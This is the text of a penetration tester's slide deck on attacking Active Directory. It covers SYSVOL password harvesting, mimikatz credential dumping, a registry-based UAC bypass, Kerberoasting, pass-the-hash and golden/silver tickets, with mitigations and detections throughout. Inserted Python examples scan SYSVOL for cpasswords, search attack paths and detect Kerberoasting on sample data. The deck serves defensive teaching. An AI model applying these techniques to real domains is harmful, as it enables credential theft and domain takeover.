Attacker’s Perspective of
Active Directory
Sunny Neo
1
whoami
•Penetration Tester
•Disclaimer: All opinions are mine, not a representation of the
company I work for or organizations I am affiliated with
•None of these materials are original. They are just a compilation of
research done by awesome people
•Test all recommendations first, before implementing them. I take no
liability if they mess up your environment
2
Shout Out
•Sean Metcalf (@PyroTek3) for running https://adsecurity.org
•Will Schroeder (@harmj0y) for developing and releasing tools for
Modern Red Teaming (Empire, PowerSploit, Veil-Framework,
Bloodhound)
•Benjamin Delpy (@gentilkiwi) for mimikatz and continuously
improving it
•And Everyone else who contributed!
3
Defender’s Dilemma
•Cliché
•Attackers just need to win once
•Defenders need to win all the time
4
Attacker’s Dilemma
•The new cliché
•Attackers need to evade all detection
•Defenders just need one alarm/trigger to know attackers are in
•“Defender's Dilemma vs Intruder's Dilemma” – TaoSecurity (2009)
5
Assume Breach Mentality
•Prepare for threats beyond the WALL (Defence in Depth / Layered
Defence) – CYBER RESILIENCE
•Contain threats (Limit the attacker’s movement)
•Detect & Respond to threats (Threat Hunting / IOC) – CYBER AGILITY
•Prevention is still important, but it is critical to move beyond it
6
Adversarial Tactics, Techniques, and
Common Knowledge (ATT&CK™)
Source: https://attack.mitre.org/wiki/Main_Page
7
Red Team’s Tactics, Techniques and
Procedures (TTPs)
Active Directory
•Microsoft’s Directory Service (AD DS) – A set of services to manage
network resources
•Domain Controller (DC) – Server running AD DS
•Domain Admins (DA) – The user group that has full control of all
resources in the Domain
•Local Administrators – The user group that has full control of a
specific machine
8
Windows Authentication
•NTLM Authentication
• Challenge-Response Protocol (the password never crosses the wire, but the
hash is the key, so the hash is as good as the password)
•Kerberos
• Ticket based; the default for domain accounts
•Single Sign On (SSO): credentials are cached in LSASS so the user is not
prompted again
9
NTLM Authentication
10
Source: https://msdn.microsoft.com/en-us/library/ff647076.aspx
Kerberos Authentication
11
Source: https://msdn.microsoft.com/en-us/library/ff647076.aspx
Kerberos Authentication
• Ticket Granting Ticket (TGT) contains
• Privilege Attribute Certificate (PAC) stores
• Account Name
• Security Identifiers
• Group Membership
• User requests a TGT by sending a timestamp encrypted with his secret key (for the RC4
cipher, the secret key is the NTLM hash)
• The TGT is encrypted, and its PAC signed, with the domain KRBTGT account’s secret key (NTLM
hash), so it is only readable by a Domain Controller (DC)
• A service ticket issued by the Ticket Granting Service (TGS) is encrypted with the target
service account’s secret key (NTLM hash)
12
High Level Methodology
Initial Foothold
Privilege Escalation
Situational Awareness
Lateral Movement
Persistence
13
*Missing Data Exfiltration
Initial Foothold
•Unpatched Vulnerabilities
•Spear Phishing
•Weak Credentials
14
Privilege Escalation: User to Local Admin
•Unpatched Vulnerabilities
•System Misconfigurations
• Passwords stored in SYSVOL / Group Policy Preferences (GPP)
•Check out Paul Craig’s talk on Local Privilege Escalation
http://www.vantagepoint.sg/news/48-security-wednesdays-9-local-privilege-escalation-nus-greyhats or
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
15
Passwords stored in SYSVOL
•SYSVOL
• Domain-wide shared folder, replicated to every Domain Controller
• Stores logon scripts and domain Group Policies
• Any authenticated user on the domain can read it
•Scripts with cleartext admin credentials stored in SYSVOL
16
Passwords stored in SYSVOL
•Group Policy with Password defined for Local Administrator account
17
Passwords stored in SYSVOL
•Encryption key is well known
18
Source: https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx
Passwords stored in SYSVOL
19
Passwords stored in SYSVOL Mitigation &
Detection
•Install KB2962486 (MS14-025) so that new passwords can no longer be
stored in GPP, then delete the existing XML files / Group Policy
preferences that already carry a cpassword attribute
•Plant a decoy XML with a “Password”/cpassword attribute in SYSVOL
•Configure a SACL on the decoy XML to audit read access (Event ID 4663)
20
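A SYSVOL sweep for the cpassword attribute, the check behind “delete existing XMLs”, as an added Python example; it is not code from the slides. The Groups.xml, ScheduledTasks.xml and Drives.xml contents are constructed, with a made-up cpassword value and invented GUIDs and account names; only the element and attribute names follow the real Group Policy Preferences schema. The script finds and sizes the ciphertext (AES-256-CBC under the key published on the MSDN page cited above, so always a multiple of 16 bytes); decryption is left out because it needs an AES library outside the standard library.

```python
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

# Made-up cpassword: 32 bytes of "ciphertext", base64 with the '=' padding stripped,
# which is exactly how GPP stores the value.
FAKE_CPASSWORD = base64.b64encode(bytes(range(32))).decode().rstrip("=")

# Constructed SYSVOL fragment (not a real policy). Element/attribute names follow the GPP
# schema; GUIDs, accounts and paths are invented.
SAMPLE_SYSVOL = {
    "Policies/{11111111-2222-3333-4444-555555555555}/Machine/Preferences/Groups/Groups.xml":
        '<?xml version="1.0" encoding="utf-8"?>'
        '<Groups><User name="Administrator (built-in)" changed="2017-01-20 10:02:33">'
        '<Properties action="U" newName="" description="" cpassword="' + FAKE_CPASSWORD + '"'
        ' changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"'
        ' userName="Administrator (built-in)"/></User></Groups>',
    "Policies/{11111111-2222-3333-4444-555555555555}/Machine/Preferences/ScheduledTasks/ScheduledTasks.xml":
        '<?xml version="1.0" encoding="utf-8"?>'
        '<ScheduledTasks><Task name="Backup">'
        '<Properties action="C" runAs="CORP\\svc_backup" cpassword="" logonType="S4U"/>'  # empty: no password set
        '</Task></ScheduledTasks>',
    "Policies/{66666666-7777-8888-9999-000000000000}/Machine/Preferences/Drives/Drives.xml":
        '<?xml version="1.0" encoding="utf-8"?>'
        '<Drives><Drive name="H:"><Properties action="U" path="\\\\fileserver\\home" label="Home"/>'
        '</Drive></Drives>',
}


def pad_b64(s: str) -> str:
    """GPP drops the '=' padding from the base64 cpassword; restore it before decoding."""
    return s + "=" * (-len(s) % 4)


def find_cpasswords(sysvol_root: str):
    """Walk a SYSVOL tree and report every Preferences XML carrying a non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        if "preferences" not in dirpath.lower():
            continue
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue
            for el in root.iter():
                cpassword = el.get("cpassword")
                if not cpassword:          # absent, or cpassword="" meaning no password was set
                    continue
                blob = base64.b64decode(pad_b64(cpassword))
                findings.append({
                    "file": os.path.relpath(path, sysvol_root).replace(os.sep, "/"),
                    "preference": root.tag,   # Groups, ScheduledTasks, Services, DataSources, Drives
                    "account": el.get("userName") or el.get("runAs") or el.get("accountName") or "?",
                    "ciphertext_len": len(blob),   # AES-256-CBC output: a multiple of 16 bytes
                })
    return findings


def build_sample_sysvol() -> str:
    """Write the constructed files into a temp dir laid out like the Policies folder of SYSVOL."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    for rel, xml in SAMPLE_SYSVOL.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(xml)
    return root


if __name__ == "__main__":
    for finding in find_cpasswords(build_sample_sysvol()):
        print(finding)
```

Point `find_cpasswords` at `\\<domain>\SYSVOL\<domain>\Policies` on a domain-joined host to run it for real; the decoy XML from the mitigation slide will show up in the output too, which is a useful reminder that the honey file must be excluded from any cleanup script.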
Why do we need Local
Privilege Escalation?
21
Why do we need to Privilege Escalate?
•Gain access to implicit trust relationship artifacts
•Assume artifacts found on one machine could be used to access other
machines
•More Information:
http://foofus.net/goons/hinge/presos/insidious-implicit-windows-trust-relationships.pdf
22
Dump Implicit Trust Relationship Artifacts
•Dump & Crack Local Accounts’ Hashes (Hashes == Passwords: a hash can be
passed without ever cracking it)
•Dump Credentials in memory
•Dump Kerberos Tickets
•Dump Access Tokens
23
Dump Credentials in memory (mimikatz)
24
•Single Sign On experience ☺
Dump Credentials Mitigation
• Audit for misconfigurations that can lead to privilege escalation with
windows-privesc-check (https://github.com/pentestmonkey/windows-privesc-check) or
PowerUp (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
• Install KB2871997 on Windows 7, 8, Server 2008 R2 and 2012 (Windows 8.1 / Server 2012 R2
already ship with these changes)
• Deploy Application Whitelisting (AppLocker & Device Guard)
• Get rid of Windows Server 2003
• Have different trust levels for machines – a Domain Admin should never log on to machines
with a lower trust level
25
Dump Credentials Detection
•Monitor the Registry value “UseLogonCredential” at
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
•Value “1” makes WDigest keep the cleartext password in LSASS; attackers set it
back on systems where the default is “0” (after KB2871997, Windows 8.1+)
•Honey Credentials
26
Dump Credentials Detection (Not a good idea)
● Detect mimikatz in memory using Sysmon image-load events (Be careful of performance impact)
● Look for a single process loading all of
○ C:\Windows\System32\WinSCard.dll
○ C:\Windows\System32\cryptdll.dll
○ C:\Windows\System32\hid.dll
○ C:\Windows\System32\samlib.dll
○ C:\Windows\System32\vaultcli.dll
● With LSA Protection enabled, look for the loading of mimidrv.sys (mimikatz’s driver, used to turn LSA Protection off)
● More information:
https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow ← Sysmon Tutorial
https://medium.com/@lennartkoopmann/explaining-and-adapting-tays-sysmon-configuration-27d9719a89a8#.c8sokq3nj
https://cyberwardog.blogspot.sg/2017/03/chronicles-of-threat-hunter-hunting-for.html
27
Dump Credentials Detection
28
Source: https://twitter.com/markrussinovich/status/830997478182785024
Dump Credentials Detection Bypass
29
Source: https://twitter.com/raka_baraka/status/831040028436525056
User Account Control (UAC) is Enabled!
•UAC was introduced in Windows Vista
•Processes run with standard user rights
even if the user is in the Administrators group,
unless elevation is explicitly approved
30
UAC Bypass
• Old School
• Privileged file copy (IFileOperation
COM object)
• DLL Hijacking
• Auto-elevation
• New School
• Fileless UAC Bypass via Registry
Hijacking
• Write to
HKCU\Software\Classes\mscfile\shell\open\command
• Launch eventvwr.exe (auto-elevated; it resolves the .msc
handler from HKCU before HKCR, so the planted command runs elevated)
31
• More information:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/
UAC Bypass Mitigation & Detection
• Reduce the number of users with Administrator privileges
• Set the UAC level to “Always Notify” instead of the default configuration (the
default level can be bypassed, e.g. via the Disk Cleanup scheduled task)
• Monitor the Registry key
“HKCU\Software\Classes\mscfile\shell\open\command”
• More information:
https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
32
Situational Awareness
• Port Scan
• DNS Enumeration (SRV records, *._tcp.domain.com)
• Password / Hash Spray
• Service Principal Name (SPN) Scanning
• Domain Enumeration & Admin Hunting
• BloodHound
33
Password / Hash Spray
•Quick and dirty way to identify access across the network
•Good for a pen test that doesn’t require stealth: every attempt leaves a
logon event on the target, and mind the domain lockout policy
34
Service Principal Name (SPN) Scanning
•An SPN uniquely identifies a service instance for Kerberos
Authentication (e.g. MSSQLSvc/sqlsrv01.corp.local:1433)
•Gather services across the domain with one LDAP query to the DC (Without a
Single Port Scanned!)
35
Service Principal Name (SPN) Scanning
•PowerShell scripts from Sean Metcalf
https://github.com/PyroTek3/PowerShell-AD-Recon
•Comprehensive List of SPNs
http://adsecurity.org/?page_id=183
•How SPNs are used by Kerberos
http://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
36
Domain Enumeration
37
Domain Enumeration
38
Domain Enumeration with PowerView
•PowerView
• Based on PowerShell
• Provides PowerShell replacements for the “net” commands (net user, net group, net view)
• Uses Win32 API calls directly, so it needs neither RSAT nor the ActiveDirectory module
• Gains network situational awareness
•More Information:
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
39
Domain Enumeration with PowerView
40
Domain Enumeration with PowerView
41
Domain Enumeration with PowerView
42
Domain Enumeration with PowerView
43
Admin Hunting with PowerView
• Implicit trust relationship
• Look at where the current user has Local Administrator rights
• Look for where privileged users are logged on
• Target machines with privileged users
• Steal their tokens / credentials
• Profit!
44
Admin Hunting with PowerView
45
• Invoke-UserHunter
• Get a list of hosts from AD
• Get a list of users of a specific Domain Group (Domain Admins/Local Administrators)
• Run NetSessionEnum (User Sessions) and NetWkstaUserEnum (Logged On Users)
against each host and match the results with the user list
• (Optionally) Check if the current user has Local Administrator rights on each host
• More Information
http://www.slideshare.net/harmj0y/i-hunt-sys-admins-20
http://www.slideshare.net/harmj0y/i-have-the-powerview
Admin Hunting with PowerView
46
Source: http://www.slideshare.net/harmj0y/i-hunt-sys-admins-20
Admin Hunting with PowerView
47
BloodHound
• Provides a graph of attack paths built from data collected with a customized
PowerView ingestor (sessions, local admin rights, group membership)
• Simplifies Admin Hunting across the network to achieve Derivative Local
Admin: chaining local admin rights and logged-on sessions host by host
• More information
https://wald0.com/?p=14
http://www.slideshare.net/AndyRobbins3/six-degrees-of-domain-admin-bloodhound-at-def-con-24
https://github.com/BloodHoundAD/BloodHound/wiki
48
BloodHound
49Source: Raphael Mudge – BloodHound - Analyzing Active Directory Trust Relationships
https://www.youtube.com/watch?v=gOpsLiJFI1o
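The admin-hunting loop and BloodHound’s graph search reduced to their data structures, as an added Python example; this is not code from the slides, PowerView or BloodHound. The hosts, users, sessions and local-admin memberships are constructed sample data; on a real engagement they come from NetSessionEnum/NetWkstaUserEnum, the local Administrators groups and AD group membership.

```python
from collections import deque

# Constructed sample domain (not real data). Three relationship types, the same edges
# BloodHound draws: AdminTo (local Administrators membership), HasSession (logged-on users,
# as NetSessionEnum / NetWkstaUserEnum report them) and MemberOf.
LOCAL_ADMINS = {                       # host -> principals in its local Administrators group
    "WS01": {"alice", "Helpdesk"},
    "WS02": {"Helpdesk"},
    "SRV-FILE": {"svc_backup", "Helpdesk"},
    "SRV-SQL": {"svc_sql", "Server Ops"},
    "DC01": {"Domain Admins"},
}
SESSIONS = {                           # host -> users with a session on it right now
    "WS01": {"alice"},
    "WS02": {"bob", "svc_backup"},
    "SRV-FILE": {"svc_sql"},
    "SRV-SQL": {"da_carol"},
    "DC01": {"da_carol"},
}
GROUPS = {                             # group -> members
    "Domain Admins": {"da_carol"},
    "Helpdesk": {"bob"},
    "Server Ops": {"svc_sql"},
}


def admin_to(principal: str) -> set:
    """Hosts where `principal` is a local administrator, directly or through a group."""
    groups = {g for g, members in GROUPS.items() if principal in members}
    return {host for host, admins in LOCAL_ADMINS.items()
            if principal in admins or admins & groups}


def where_admins_logged_on(group: str = "Domain Admins") -> dict:
    """Invoke-UserHunter's question: on which hosts does a member of `group` have a session?"""
    targets = GROUPS.get(group, set())
    return {host: users & targets for host, users in SESSIONS.items() if users & targets}


def path_to(start_user: str, group: str = "Domain Admins"):
    """BloodHound-style breadth-first search for the shortest derivative-local-admin chain:
    user -AdminTo-> host -HasSession-> user -AdminTo-> ... until a member of `group`.
    Returns [user, host, user, ..., user], or None when no path exists."""
    targets = GROUPS.get(group, set())
    queue = deque([[start_user]])
    seen = {start_user}
    while queue:
        path = queue.popleft()
        current = path[-1]
        if current in targets:
            return path
        for host in sorted(admin_to(current)):
            for victim in sorted(SESSIONS.get(host, ())):     # whose token/creds can be stolen there
                if victim not in seen:
                    seen.add(victim)
                    queue.append(path + [host, victim])
    return None


if __name__ == "__main__":
    print("Domain Admin sessions:", where_admins_logged_on())
    print("Path from bob:", " -> ".join(path_to("bob")))
    print("Path from alice:", path_to("alice"))
```

`where_admins_logged_on` is the UserHunter view (where are the DAs right now); `path_to` is the BloodHound view (how does a helpdesk user get there). With the sample data bob, a Helpdesk member, reaches Domain Admin in two hops: he is local admin on SRV-FILE, steals svc_sql’s token there, svc_sql is local admin on SRV-SQL, where da_carol has a session. Alice, local admin only on her own workstation, has no path at all.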
Domain Enumeration Mitigation
•Use Net Cease to change the default NetSessionEnum permissions so that
non-admin users can no longer enumerate sessions remotely
https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b
•Upgrade to Windows 10 and Windows Server 2016
•Use SAMRi10 to restrict remote SAM queries (>= Windows 10 & Server 2016)
https://www.bleepingcomputer.com/news/security/microsoft-researchers-release-anti-reconnaissance-tool-named-samri10/
50
Lateral Movement
• Reuse cleartext credentials (less effective after KB2871997, as WDigest no
longer caches them in LSASS)
• Pass the Hash (less effective after KB2871997 for local accounts)
• Pass the Key (Overpass-the-hash)
• Impersonate Tokens
• Pass the Ticket
• Kerberoasting
51
Pass the Hash (PtH)
52
Source: http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it
Pass the Hash (PtH)
•Not working well after KB2871997
•Local accounts other than the built-in Administrator can be denied network
logon via the new “Local account” SIDs (S-1-5-113 / S-1-5-114), and by default
only receive a filtered, non-admin token over the network
•PtH still possible for
• Default Local Administrator (RID 500) hash
• Domain account hashes
53
Pass the Key (Overpass the Hash)
•KB2871997 stops WDigest from keeping cleartext credentials in memory
(LSASS)
•NTLM hashes and Kerberos (e)keys are still kept in memory for SSO
•Remember how the Kerberos ticket request is done?
54
Kerberos Authentication Recap
55
Source: http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it
Kerberos Authentication Recap
56
Pass the Key (Overpass the Hash)
•The user’s Kerberos secret key depends on the cipher: for RC4-HMAC it is the
NTLM hash itself, for AES it is derived from the password and a salt
•Exploit Steps
• Escalate privileges to Local Admin
• Dump hashes/(e)keys from LSASS
• Create a new process and inject the stolen hash/(e)key into its logon session
• SSO will use the injected key to request a TGT
• Impersonate the token of the newly created process
• Win!
57
Pass the Key (Overpass the Hash)
58
•User “labgg” is Domain Admin logged in on Compromised Machine
Pass the Key (Overpass the Hash)
59
Pass the Key (Overpass the Hash)
60
•Some bug with Empire’s “shell” command so switched it to Meterpreter
Pass the Key (Overpass the Hash)
61
More Information:
http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/
http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
Pass the Ticket
•Export Ticket-Granting-Ticket (TGT) from memory of a compromised
Host
•Import the TGT into Attacker’s Machine
•Profit!
62
Pass the Ticket with MS14-068
•MS14-068 (CVE-2014-6324)
• Privilege escalation from any authenticated domain user to Domain Admin by
forging the PAC
• PAC stores Authorization Data (Group Membership, Security Identifiers)
• The KDC improperly validated the PAC signature, accepting unkeyed
checksum types that an attacker can compute without the KRBTGT key
63
Pass the Ticket with MS14-068
64
More Information:
https://labs.mwrinfosecurity.com/blog/digging-into-ms14-068-exploitation-and-defence/
https://www.trustedsec.com/december-2014/ms14-068-full-compromise-step-step/
https://github.com/bidord/pykek/
Pass the Ticket with MS14-068
65
Kerberoasting
•Any domain user can request a service ticket for any SPN without actually
using the service
•The service ticket issued by the TGS is encrypted with the target service
account’s secret key
•Service accounts are usually privileged accounts on the domain, with
passwords that are rarely changed
66
Kerberoasting
•Why not just crack it?
• Offline Attack without contacting the Target Service’s Machine
67
Source: https://adsecurity.org/?p=2293
Kerberoasting
68
More Information:
http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
https://room362.com/post/2016/kerberoast-pt3/
Kerberoasting
69
Kerberoasting Mitigation
•Use passwords with >= 25 characters for service accounts
•Use (Group) Managed Service Accounts, whose passwords are long, random and
rotated automatically
•More Information:
https://adsecurity.org/?p=2293
https://technet.microsoft.com/en-us/library/dd548356(v=ws.10).aspx
70
Kerberoasting Detection
•Enable “Audit Kerberos Service Ticket Operations” for Success on the Domain Controllers
•Look for Event 4769 with Ticket Options 0x40810000 and Ticket
Encryption Type RC4 (0x17/0x18); exclude krbtgt and computer accounts, and
alert when one account requests tickets for many different SPNs in a short time
•Create a Honey Service ☺ (an account with an SPN that nobody legitimately requests)
•More information:
https://adsecurity.org/?p=3458
https://adsecurity.org/?p=3513
71
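The 4769 hunt described above, run over constructed event records, as an added Python example (not from the slides or adsecurity.org). The field names match the EventData of a Security log 4769 event; the timestamps, accounts and the decoy account svc_honey are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def ev(time, user, service, etype="0x17", options="0x40810000", status="0x0"):
    """One 4769 record using the EventData field names of the Security log."""
    return {"time": time, "TargetUserName": user, "ServiceName": service,
            "TicketOptions": options, "TicketEncryptionType": etype, "Status": status}


# Constructed sample events (not real log data); all are Event ID 4769 from a DC.
EVENTS = [
    ev("2017-05-01T09:00:01", "bob@CORP.LOCAL", "svc_sql"),
    ev("2017-05-01T09:00:02", "bob@CORP.LOCAL", "svc_backup"),
    ev("2017-05-01T09:00:02", "bob@CORP.LOCAL", "svc_honey"),
    ev("2017-05-01T09:00:03", "bob@CORP.LOCAL", "svc_web"),
    ev("2017-05-01T09:05:00", "alice@CORP.LOCAL", "WS01$", etype="0x12"),   # AES256: normal traffic
    ev("2017-05-01T09:06:00", "WS02$@CORP.LOCAL", "krbtgt"),                # TGT renewal, not a service
    ev("2017-05-01T09:07:00", "legacyapp@CORP.LOCAL", "svc_legacy"),        # one RC4 request: under threshold
]

RC4_ETYPES = {"0x17", "0x18"}
ROAST_TICKET_OPTIONS = "0x40810000"   # forwardable | renewable | canonicalize, what the common tools request
HONEY_SPN_ACCOUNTS = {"svc_honey"}    # hypothetical decoy account owning an SPN nobody should ever ask for


def is_rc4_tgs_request(event) -> bool:
    service = event["ServiceName"]
    return (event["TicketEncryptionType"].lower() in RC4_ETYPES
            and event["TicketOptions"].lower() == ROAST_TICKET_OPTIONS
            and event["Status"] == "0x0"
            and not service.endswith("$")          # computer accounts: AES-capable, random passwords
            and service.lower() != "krbtgt")


def detect_kerberoast(events, threshold=3, window=timedelta(minutes=5)):
    """Return (requester, reason, detail) alerts for
    - any 4769 naming a honey SPN account, whatever the cipher;
    - >= `threshold` distinct RC4 service tickets for one requester within `window`."""
    alerts = []
    rc4_by_user = defaultdict(list)
    for event in events:
        if event["ServiceName"] in HONEY_SPN_ACCOUNTS:
            alerts.append((event["TargetUserName"], "honey SPN requested", event["ServiceName"]))
        if is_rc4_tgs_request(event):
            rc4_by_user[event["TargetUserName"]].append(
                (datetime.fromisoformat(event["time"]), event["ServiceName"]))
    for user, requests in rc4_by_user.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):           # sliding window over this user's requests
            spns = {spn for t, spn in requests[i:] if t - start <= window}
            if len(spns) >= threshold:
                alerts.append((user, "many RC4 service tickets", sorted(spns)))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(EVENTS):
        print(alert)
```

Tune `threshold` and `window` to the environment: a domain with legacy systems produces a steady trickle of RC4 4769 events from the same accounts every day, so the baseline of distinct SPNs per account is what separates an application that really uses RC4 from a user pulling every SPN in the domain in three seconds.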
Lateral Movement Mitigation
• Deploy Microsoft LAPS on servers and workstations to manage Local Administrator passwords
• Deploy Group Policy: “Deny access to this computer from the network” & “Deny log on through Remote
Desktop Services” for “Local account and member of Administrators group” (S-1-5-114) [this blocks
PtH with the RID 500 account as well]
• Add users with high privileges to the “Protected Users” group if possible
• Network Segmentation – It’s always about the Trust Path
• Restrict workstation-to-workstation communication with GPO – Windows Firewall
• More Information:
https://adsecurity.org/?p=3299
https://adsecurity.org/?p=3377
https://technet.microsoft.com/en-us/library/dn466518.aspx
72
Lateral Movement Mitigation
• Different Tiers of Administrators for Different Tiers of Servers & Workstations
73
More Information:
https://technet.microsoft.com/en-us/library/mt631193.aspx
Lateral Movement Detection
•Turn on auditing for local account logons (a network logon, type 3, by a local
account is the lateral-movement pattern)
•Turn on auditing for Kerberos
• Look out for domain names in lower case/non-standard form in 4624 / 4768 events,
a common tool default (Not comprehensive)
• Look out for Ticket Encryption Type 0x17/0x18 for RC4 (Not comprehensive)
•More Information:
https://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attacks/
https://dfir-blog.com/2016/03/13/how-to-parse-windows-eventlog/
74
Persistence
•Hash Dump & Crack the Hashes
•Golden Ticket
•Silver Ticket
75
Hash Dump & Crack The Hashes
•Old School
• Get the NTDS.dit file (plus the SYSTEM hive, which holds the boot key needed to decrypt it)
• Backup
• Virtual Machine Disk
• Volume Shadow Copy
• Process NTDS.dit for hashes
•New School
• DCSync (no need for direct access to NTDS.dit)
76
DCSync
•Impersonate a Domain Controller
•Replicate user credentials via the Directory Replication Service (DRS)
Remote Protocol (GetNCChanges)
•No code execution on the DC required, but replication rights are needed (by
default held by Domain Admins, Enterprise Admins and Domain Controllers)
•If done from a Domain Controller account it blends in with normal replication;
otherwise look for Event 4662 with the DS-Replication-Get-Changes-All property
requested by an account that is not a DC
77
DCSync
78
Golden Ticket
• Forged TGT with admin privileges, then PTT
• The TGT is encrypted & signed with
• the domain KRBTGT account’s secret key
• Important to note that the KRBTGT password is almost never changed, so the forged
TGT stays valid until it is (and it has to be changed twice)
• Information required to create a Golden Ticket
• Domain Name
• Domain SID
• Domain KRBTGT NTLM Hash/(e)Keys
• User RID to impersonate (e.g. 500) and the group RIDs to put in the PAC
79
Golden Ticket
80
Golden Ticket
81
Golden Ticket
82
More Information:
https://blog.didierstevens.com/2016/08/12/mimikatz-golden-ticket-dcsync/
http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
Silver Ticket
•Forged Service Ticket
•Requires only the service account’s key instead of KRBTGT’s
•Access is restricted to the specific service, but the DC is never contacted, so
no 4769 is logged for the forged ticket
•More Information:
https://adsecurity.org/?p=2011
83
Silver Ticket
84
Silver Ticket
85
Persistence Mitigation and Detection
•Reset the KRBTGT password twice (the KDC accepts tickets under the current and
the previous key, so a single reset leaves Golden Tickets valid), wait for
replication between the two resets, and repeat regularly
•Look out for RC4 Kerberos traffic – from Vista / Server 2008 onwards the default
cipher for Kerberos is AES, and tickets forged from an NTLM hash use RC4 (Not
comprehensive)
•Use Group Managed Service Accounts so that service account keys rotate
automatically, limiting the lifetime of Silver Tickets
•More information:
https://adsecurity.org/?p=1515
86
Mitigations for PowerShell Activities
● Lock down PowerShell.exe and PowerShell_ISE.exe (Not ideal: System.Management.Automation.dll
can be hosted by any other binary)
● Uninstall PowerShell v2 (a downgrade to v2 bypasses the v5 logging)
● Use PowerShell v5 with
○ Constrained Language Mode enforced through AppLocker / Device Guard
○ Logging of all PowerShell activity (Module Logging, Script Block Logging, System-wide
Transcript Logging)
● More information:
https://adsecurity.org/?p=2604
87
Microsoft Advanced Threat Analytics (ATA)
• Behavioural analytics / machine learning platform (port-mirrored DC traffic plus Windows
events) that detects quite a number of the techniques we have discussed, e.g. reconnaissance,
Pass the Ticket, Golden Ticket, Overpass the Hash and DCSync
• Receives logs and events from the SIEM and Windows Event Forwarding (WEF)
• More information:
https://docs.microsoft.com/en-us/advanced-threat-analytics/understand-explore/ata-threats
https://adsecurity.org/?p=1583
https://gallery.technet.microsoft.com/Advanced-Threat-Analytics-8b0a86bc/file/169608/1/ATA%20Playbook.pdf
88
Microsoft Advanced Threat Analytics
89
Source:
https://blogs.technet.microsoft.com/enterprisemobility/2015/05/04/microsoft-advanced-threat-analytics-public-preview-release-is-now-available/
Q & A?
90
Reference
• Adversarial Tactics, Techniques & Common Knowledge
https://attack.mitre.org/wiki/Main_Page
• Attack Methods for Gaining Domain Admin Rights in Active Directory
https://adsecurity.org/?p=2362
• PROTECTING WINDOWS NETWORKS – KERBEROS ATTACKS
https://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attacks/
• The Most Common Active Directory Security Issues and What You Can Do to Fix Them
https://adsecurity.org/?p=1684
• Building an Empire with PowerShell
http://www.slideshare.net/harmj0y/building-an-empire-with-powershell
91
Reference
• Mimikatz and DCSync and ExtraSids, Oh My
http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
• Make PowerView Great Again
http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
• Six Degree of Domain Admin
https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Robbins-Vazarkar-Schroeder-Six-Degrees-of-Domain-Admin.pdf
• kerberos, kerberoast and golden tickets
https://leonjza.github.io/blog/2016/01/09/kerberos-kerberoast-and-golden-tickets/
• Mimikatz 2.0 - Silver Ticket Walkthrough
https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html#Why
92

Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
nkrafacyberclub
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
